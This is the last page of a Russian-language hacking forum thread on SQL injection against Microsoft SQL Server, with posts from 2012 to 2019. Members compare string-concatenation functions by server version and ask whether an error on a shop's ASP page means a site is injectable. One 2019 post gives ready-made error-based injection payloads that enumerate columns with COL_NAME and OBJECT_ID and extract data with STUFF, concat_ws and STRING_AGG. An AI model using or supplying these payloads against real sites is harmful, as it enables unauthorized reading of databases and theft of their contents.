HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу Провидение Иньекций в MSSQL сервер от Microsoft.
   
 
Страница 12 из 12 « Первая < 2 8 9 10 11 12
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 26.06.2012, 19:33
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию
Цитата:
Сообщение от cat1vo  
cat1vo said:
cast() - это привидение к определенному типу данных, а не объединение! Используйте concat()
В mssql concat тоже работает? ща попробую
 

  #112  
Старый 27.06.2012, 00:37
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию
такс.. походу наводка не совсем правильная. concat реализована только с MS SQL 2012. думаю такое в настоящее время редко найдешь. у меня банальная версия:

Цитата:
Сообщение от None  
Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (Intel X86) Mar 29 2009 10:27:29 Copyright (c) 1988-2008
вопрос актуален.
 

  #113  
Старый 02.10.2013, 19:56
WF34
Guest
Сообщений: n/a
Провел на форуме:
195

Репутация: 0
По умолчанию
если выводит такую ошибку

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Invalid SQL statement; expected 'DELETE', 'INSERT', 'PROCEDURE', 'SELECT', or 'UPDATE'.

/shop/en/products.asp, line 32

то sql инекция осуществима?
 

  #114  
Старый 01.12.2019, 17:55
Baskin-Robbins
Guest
Сообщений: n/a
Провел на форуме:
92829

Репутация: 212
По умолчанию
Еще раз про подбор колонок, старая фича

Код:
Code:
152 and 1=COL_NAME(OBJECT_ID('master.sys.routes'), n)
где n номер колонки

Как альтернатива + и concat, в некоторой степени можно использовать STUFF

Код:
Code:
152 and 1=(SELECT top 1 (STUFF(@@version,1,0,zoneid)) FROM webkits..zones) --%20
1 -- позиция для вставки

0 -- определяет, какое количество символов следует удалить после вставки

C 2017 версии появилась concat_ws -- немного удобства для нас

Код:
Code:
152 and 1=concat_ws('A',(COL_NAME(OBJECT_ID('master.sys.routes'),3)),(COL_NAME(OBJECT_ID('master.sys.routes'), 2))) --%20
Так же с 2017 версии появился полноценный group_concat - привычно и удобно.

Код:
Code:
152 and 1=(SELECT STRING_AGG(zoneid, char(35)) FROM webkits..zones) --%20
 
 
Страница 12 из 12 « Первая < 2 8 9 10 11 12



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Мнения: "Безопасность от Microsoft: шаг к обновленному миру?" dinar_007 Мировые новости. Обсуждения. 5 25.12.2006 19:20
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости. Обсуждения. 17 12.12.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ